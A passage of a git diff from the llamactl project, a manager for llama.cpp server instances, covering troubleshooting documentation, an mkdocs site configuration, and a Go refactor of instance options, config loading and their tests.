Check llama-server [docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md) for more information.
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```

View File

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

68
mkdocs.yml Normal file
View File

@@ -0,0 +1,68 @@
site_name: Llamatl Documentation
site_description: User documentation for Llamatl - A management tool for Llama.cpp instances
site_author: Llamatl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

7
pkg/backends/backend.go Normal file
View File

@@ -0,0 +1,7 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
)

View File

@@ -15,6 +15,9 @@ type AppConfig struct {
Server ServerConfig `yaml:"server"` Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"` Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"` Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
} }
// ServerConfig contains HTTP server configuration // ServerConfig contains HTTP server configuration
@@ -52,6 +55,12 @@ type InstancesConfig struct {
// Maximum number of instances that can be created // Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"` MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Path to llama-server executable // Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"` LlamaExecutable string `yaml:"llama_executable"`
@@ -63,6 +72,15 @@ type InstancesConfig struct {
// Default restart delay for new instances (in seconds) // Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"` DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
} }
// AuthConfig contains authentication settings // AuthConfig contains authentication settings
@@ -101,10 +119,15 @@ func LoadConfig(configPath string) (AppConfig, error) {
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"), LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true, AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
LlamaExecutable: "llama-server", LlamaExecutable: "llama-server",
DefaultAutoRestart: true, DefaultAutoRestart: true,
DefaultMaxRestarts: 3, DefaultMaxRestarts: 3,
DefaultRestartDelay: 5, DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
}, },
Auth: AuthConfig{ Auth: AuthConfig{
RequireInferenceAuth: true, RequireInferenceAuth: true,
@@ -196,6 +219,16 @@ func loadEnvVars(cfg *AppConfig) {
cfg.Instances.MaxInstances = m cfg.Instances.MaxInstances = m
} }
} }
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" { if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec cfg.Instances.LlamaExecutable = llamaExec
} }
@@ -214,6 +247,21 @@ func loadEnvVars(cfg *AppConfig) {
cfg.Instances.DefaultRestartDelay = seconds cfg.Instances.DefaultRestartDelay = seconds
} }
} }
if onDemandStart := os.Getenv("LLAMACTL_DEFAULT_ON_DEMAND_START"); onDemandStart != "" {
if b, err := strconv.ParseBool(onDemandStart); err == nil {
cfg.Instances.DefaultOnDemandStart = b
}
}
if onDemandTimeout := os.Getenv("LLAMACTL_ON_DEMAND_START_TIMEOUT"); onDemandTimeout != "" {
if seconds, err := strconv.Atoi(onDemandTimeout); err == nil {
cfg.Instances.OnDemandStartTimeout = seconds
}
}
if timeoutCheckInterval := os.Getenv("LLAMACTL_TIMEOUT_CHECK_INTERVAL"); timeoutCheckInterval != "" {
if minutes, err := strconv.Atoi(timeoutCheckInterval); err == nil {
cfg.Instances.TimeoutCheckInterval = minutes
}
}
// Auth config // Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" { if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil { if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {

View File

@@ -5,7 +5,7 @@ import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"io" "io"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends"
"llamactl/pkg/config" "llamactl/pkg/config"
"log" "log"
"net/http" "net/http"
@@ -13,46 +13,20 @@ import (
"net/url" "net/url"
"os/exec" "os/exec"
"sync" "sync"
"sync/atomic"
"time" "time"
) )
type CreateInstanceOptions struct { // TimeProvider interface allows for testing with mock time
// Auto restart type TimeProvider interface {
AutoRestart *bool `json:"auto_restart,omitempty"` Now() time.Time
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
llamacpp.LlamaServerOptions `json:",inline"`
} }
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions // realTimeProvider implements TimeProvider using the actual time
// This is needed because the embedded LlamaServerOptions has its own UnmarshalJSON type realTimeProvider struct{}
// which can interfere with proper unmarshaling of the pointer fields
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
}
var temp tempCreateOptions func (realTimeProvider) Now() time.Time {
if err := json.Unmarshal(data, &temp); err != nil { return time.Now()
return err
}
// Copy the pointer fields
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
return err
}
return nil
} }
// Process represents a running instance of the llama server // Process represents a running instance of the llama server
@@ -62,7 +36,8 @@ type Process struct {
globalSettings *config.InstancesConfig globalSettings *config.InstancesConfig
// Status // Status
Running bool `json:"running"` Status InstanceStatus `json:"status"`
onStatusChange func(oldStatus, newStatus InstanceStatus)
// Creation time // Creation time
Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created Created int64 `json:"created,omitempty"` // Unix timestamp when the instance was created
@@ -83,85 +58,29 @@ type Process struct {
// Restart control // Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
}
// validateAndCopyOptions validates and creates a deep copy of the provided options // Timeout management
// It applies validation rules and returns a safe copy lastRequestTime atomic.Int64 // Unix timestamp of last request
func validateAndCopyOptions(name string, options *CreateInstanceOptions) *CreateInstanceOptions { timeProvider TimeProvider `json:"-"` // Time provider for testing
optionsCopy := &CreateInstanceOptions{}
if options != nil {
// Copy the embedded LlamaServerOptions
optionsCopy.LlamaServerOptions = options.LlamaServerOptions
// Copy and validate pointer fields
if options.AutoRestart != nil {
autoRestart := *options.AutoRestart
optionsCopy.AutoRestart = &autoRestart
}
if options.MaxRestarts != nil {
maxRestarts := *options.MaxRestarts
if maxRestarts < 0 {
log.Printf("Instance %s MaxRestarts value (%d) cannot be negative, setting to 0", name, maxRestarts)
maxRestarts = 0
}
optionsCopy.MaxRestarts = &maxRestarts
}
if options.RestartDelay != nil {
restartDelay := *options.RestartDelay
if restartDelay < 0 {
log.Printf("Instance %s RestartDelay value (%d) cannot be negative, setting to 0 seconds", name, restartDelay)
restartDelay = 0
}
optionsCopy.RestartDelay = &restartDelay
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
if options.AutoRestart == nil {
defaultAutoRestart := globalSettings.DefaultAutoRestart
options.AutoRestart = &defaultAutoRestart
}
if options.MaxRestarts == nil {
defaultMaxRestarts := globalSettings.DefaultMaxRestarts
options.MaxRestarts = &defaultMaxRestarts
}
if options.RestartDelay == nil {
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
} }
// NewInstance creates a new instance with the given name, log path, and options // NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process { func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions, onStatusChange func(oldStatus, newStatus InstanceStatus)) *Process {
// Validate and copy options // Validate and copy options
optionsCopy := validateAndCopyOptions(name, options) options.ValidateAndApplyDefaults(name, globalSettings)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger // Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogsDir) logger := NewInstanceLogger(name, globalSettings.LogsDir)
return &Process{ return &Process{
Name: name, Name: name,
options: optionsCopy, options: options,
globalSettings: globalSettings, globalSettings: globalSettings,
logger: logger, logger: logger,
timeProvider: realTimeProvider{},
Running: false,
Created: time.Now().Unix(), Created: time.Now().Unix(),
Status: Stopped,
onStatusChange: onStatusChange,
} }
} }
@@ -171,6 +90,30 @@ func (i *Process) GetOptions() *CreateInstanceOptions {
return i.options return i.options
} }
func (i *Process) GetPort() int {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Port
}
}
return 0
}
func (i *Process) GetHost() string {
i.mu.RLock()
defer i.mu.RUnlock()
if i.options != nil {
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
return i.options.LlamaServerOptions.Host
}
}
return ""
}
func (i *Process) SetOptions(options *CreateInstanceOptions) { func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock() i.mu.Lock()
defer i.mu.Unlock() defer i.mu.Unlock()
@@ -180,15 +123,19 @@ func (i *Process) SetOptions(options *CreateInstanceOptions) {
return return
} }
// Validate and copy options and apply defaults // Validate and copy options
optionsCopy := validateAndCopyOptions(i.Name, options) options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
applyDefaultOptions(optionsCopy, i.globalSettings)
i.options = optionsCopy i.options = options
// Clear the proxy so it gets recreated with new options // Clear the proxy so it gets recreated with new options
i.proxy = nil i.proxy = nil
} }
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed // GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) { func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock() i.mu.Lock()
@@ -202,7 +149,15 @@ func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
return nil, fmt.Errorf("instance %s has no options set", i.Name) return nil, fmt.Errorf("instance %s has no options set", i.Name)
} }
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", i.options.Host, i.options.Port)) var host string
var port int
switch i.options.BackendType {
case backends.BackendTypeLlamaCpp:
host = i.options.LlamaServerOptions.Host
port = i.options.LlamaServerOptions.Port
}
targetURL, err := url.Parse(fmt.Sprintf("http://%s:%d", host, port))
if err != nil { if err != nil {
return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err) return nil, fmt.Errorf("failed to parse target URL for instance %s: %w", i.Name, err)
} }
@@ -232,44 +187,36 @@ func (i *Process) MarshalJSON() ([]byte, error) {
i.mu.RLock() i.mu.RLock()
defer i.mu.RUnlock() defer i.mu.RUnlock()
// Create a temporary struct with exported fields for JSON marshalling // Use anonymous struct to avoid recursion
temp := struct { type Alias Process
Name string `json:"name"` return json.Marshal(&struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"` Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{ }{
Name: i.Name, Alias: (*Alias)(i),
Options: i.options, Options: i.options,
Running: i.Running, })
Created: i.Created,
}
return json.Marshal(temp)
} }
// UnmarshalJSON implements json.Unmarshaler for Instance // UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Process) UnmarshalJSON(data []byte) error { func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling // Use anonymous struct to avoid recursion
temp := struct { type Alias Process
Name string `json:"name"` aux := &struct {
*Alias
Options *CreateInstanceOptions `json:"options,omitempty"` Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"` }{
Created int64 `json:"created,omitempty"` Alias: (*Alias)(i),
}{} }
if err := json.Unmarshal(data, &temp); err != nil { if err := json.Unmarshal(data, aux); err != nil {
return err return err
} }
// Set the fields // Handle options with validation and defaults
i.Name = temp.Name if aux.Options != nil {
i.Running = temp.Running aux.Options.ValidateAndApplyDefaults(i.Name, i.globalSettings)
i.Created = temp.Created i.options = aux.Options
// Handle options with validation but no defaults
if temp.Options != nil {
i.options = validateAndCopyOptions(i.Name, temp.Options)
} }
return nil return nil

View File

@@ -2,6 +2,7 @@ package instance_test
import ( import (
"encoding/json" "encoding/json"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp" "llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config" "llamactl/pkg/config"
"llamactl/pkg/instance" "llamactl/pkg/instance"
@@ -18,28 +19,32 @@ func TestNewInstance(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
if instance.Name != "test-instance" { inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
} }
if instance.Running { if inst.IsRunning() {
t.Error("New instance should not be running") t.Error("New instance should not be running")
} }
// Check that options were properly set with defaults applied // Check that options were properly set with defaults applied
opts := instance.GetOptions() opts := inst.GetOptions()
if opts.Model != "/path/to/model.gguf" { if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
} }
if opts.Port != 8080 { if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port) t.Errorf("Expected port 8080, got %d", inst.GetPort())
} }
// Check that defaults were applied // Check that defaults were applied
@@ -71,12 +76,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
AutoRestart: &autoRestart, AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts, MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay, RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
opts := instance.GetOptions() opts := instance.GetOptions()
// Check that explicit values override defaults // Check that explicit values override defaults
@@ -91,38 +100,6 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
} }
} }
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Test with invalid negative values
invalidMaxRestarts := -5
invalidRestartDelay := -10
options := &instance.CreateInstanceOptions{
MaxRestarts: &invalidMaxRestarts,
RestartDelay: &invalidRestartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that negative values were corrected to 0
if opts.MaxRestarts == nil || *opts.MaxRestarts != 0 {
t.Errorf("Expected MaxRestarts to be corrected to 0, got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 0 {
t.Errorf("Expected RestartDelay to be corrected to 0, got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) { func TestSetOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{ globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test", LogsDir: "/tmp/test",
@@ -132,17 +109,22 @@ func TestSetOptions(t *testing.T) {
} }
initialOptions := &instance.CreateInstanceOptions{ initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, initialOptions) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions, mockOnStatusChange)
// Update options // Update options
newOptions := &instance.CreateInstanceOptions{ newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf", Model: "/path/to/new-model.gguf",
Port: 8081, Port: 8081,
}, },
@@ -151,11 +133,11 @@ func TestSetOptions(t *testing.T) {
inst.SetOptions(newOptions) inst.SetOptions(newOptions)
opts := inst.GetOptions() opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" { if opts.LlamaServerOptions.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model) t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.LlamaServerOptions.Model)
} }
if opts.Port != 8081 { if inst.GetPort() != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port) t.Errorf("Expected updated port 8081, got %d", inst.GetPort())
} }
// Check that defaults are still applied // Check that defaults are still applied
@@ -164,46 +146,23 @@ func TestSetOptions(t *testing.T) {
} }
} }
func TestSetOptions_NilOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
originalOptions := instance.GetOptions()
// Try to set nil options
instance.SetOptions(nil)
// Options should remain unchanged
currentOptions := instance.GetOptions()
if currentOptions.Model != originalOptions.Model {
t.Error("Options should not change when setting nil options")
}
}
func TestGetProxy(t *testing.T) { func TestGetProxy(t *testing.T) {
globalSettings := &config.InstancesConfig{ globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test", LogsDir: "/tmp/test",
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Host: "localhost", Host: "localhost",
Port: 8080, Port: 8080,
}, },
} }
inst := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
inst := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
// Get proxy for the first time // Get proxy for the first time
proxy1, err := inst.GetProxy() proxy1, err := inst.GetProxy()
@@ -233,13 +192,17 @@ func TestMarshalJSON(t *testing.T) {
} }
options := &instance.CreateInstanceOptions{ options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{ BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: &llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
}, },
} }
instance := instance.NewInstance("test-instance", globalSettings, options) // Mock onStatusChange function
mockOnStatusChange := func(oldStatus, newStatus instance.InstanceStatus) {}
instance := instance.NewInstance("test-instance", globalSettings, options, mockOnStatusChange)
data, err := json.Marshal(instance) data, err := json.Marshal(instance)
if err != nil { if err != nil {
@@ -247,7 +210,7 @@ func TestMarshalJSON(t *testing.T) {
} }
// Check that JSON contains expected fields // Check that JSON contains expected fields
var result map[string]interface{} var result map[string]any
err = json.Unmarshal(data, &result) err = json.Unmarshal(data, &result)
if err != nil { if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err) t.Fatalf("JSON unmarshal failed: %v", err)
@@ -256,8 +219,8 @@ func TestMarshalJSON(t *testing.T) {
if result["name"] != "test-instance" { if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"]) t.Errorf("Expected name 'test-instance', got %v", result["name"])
} }
if result["running"] != false { if result["status"] != "stopped" {
t.Errorf("Expected running false, got %v", result["running"]) t.Errorf("Expected status 'stopped', got %v", result["status"])
} }
// Check that options are included // Check that options are included
@@ -269,20 +232,41 @@ func TestMarshalJSON(t *testing.T) {
if !ok { if !ok {
t.Error("Expected options to be a map") t.Error("Expected options to be a map")
} }
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"]) // Check backend type
if options_map["backend_type"] != string(backends.BackendTypeLlamaCpp) {
t.Errorf("Expected backend_type '%s', got %v", backends.BackendTypeLlamaCpp, options_map["backend_type"])
}
// Check backend options
backend_options_data, ok := options_map["backend_options"]
if !ok {
t.Error("Expected backend_options to be included in JSON")
}
backend_options_map, ok := backend_options_data.(map[string]any)
if !ok {
t.Error("Expected backend_options to be a map")
}
if backend_options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", backend_options_map["model"])
}
if backend_options_map["port"] != float64(8080) {
t.Errorf("Expected port 8080, got %v", backend_options_map["port"])
} }
} }
func TestUnmarshalJSON(t *testing.T) { func TestUnmarshalJSON(t *testing.T) {
jsonData := `{ jsonData := `{
"name": "test-instance", "name": "test-instance",
"running": true, "status": "running",
"options": { "options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false, "auto_restart": false,
"max_restarts": 5 "max_restarts": 5,
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"port": 8080
}
} }
}` }`
@@ -295,19 +279,25 @@ func TestUnmarshalJSON(t *testing.T) {
if inst.Name != "test-instance" { if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name) t.Errorf("Expected name 'test-instance', got %q", inst.Name)
} }
if !inst.Running { if !inst.IsRunning() {
t.Error("Expected running to be true") t.Error("Expected status to be running")
} }
opts := inst.GetOptions() opts := inst.GetOptions()
if opts == nil { if opts == nil {
t.Fatal("Expected options to be set") t.Fatal("Expected options to be set")
} }
if opts.Model != "/path/to/model.gguf" { if opts.BackendType != backends.BackendTypeLlamaCpp {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model) t.Errorf("Expected backend_type '%s', got %s", backends.BackendTypeLlamaCpp, opts.BackendType)
} }
if opts.Port != 8080 { if opts.LlamaServerOptions == nil {
t.Errorf("Expected port 8080, got %d", opts.Port) t.Fatal("Expected LlamaServerOptions to be set")
}
if opts.LlamaServerOptions.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.LlamaServerOptions.Model)
}
if inst.GetPort() != 8080 {
t.Errorf("Expected port 8080, got %d", inst.GetPort())
} }
if opts.AutoRestart == nil || *opts.AutoRestart { if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false") t.Error("Expected AutoRestart to be false")
@@ -317,58 +307,6 @@ func TestUnmarshalJSON(t *testing.T) {
} }
} }
func TestUnmarshalJSON_PartialOptions(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": false,
"options": {
"model": "/path/to/model.gguf"
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
opts := inst.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
